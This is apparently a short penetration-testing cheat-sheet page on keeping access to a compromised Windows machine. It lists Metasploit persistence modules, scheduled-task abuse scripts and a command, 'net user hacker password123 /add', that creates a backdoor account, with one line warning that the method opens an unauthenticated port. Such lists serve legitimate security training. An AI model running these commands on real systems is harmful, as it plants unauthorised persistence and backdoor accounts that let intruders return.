Maintaining access

Dangerous to do because we open a port on the machine without authentication...

Persistence Scripts

  • run persistence -h

  • exploit/windows/local/persistence

  • exploit/windows/local/registry_persistence

Scheduled tasks

  • run scheduleme

  • run schtaskabuse

Add a user

  • net user hacker password123 /add

Last updated

Was this helpful?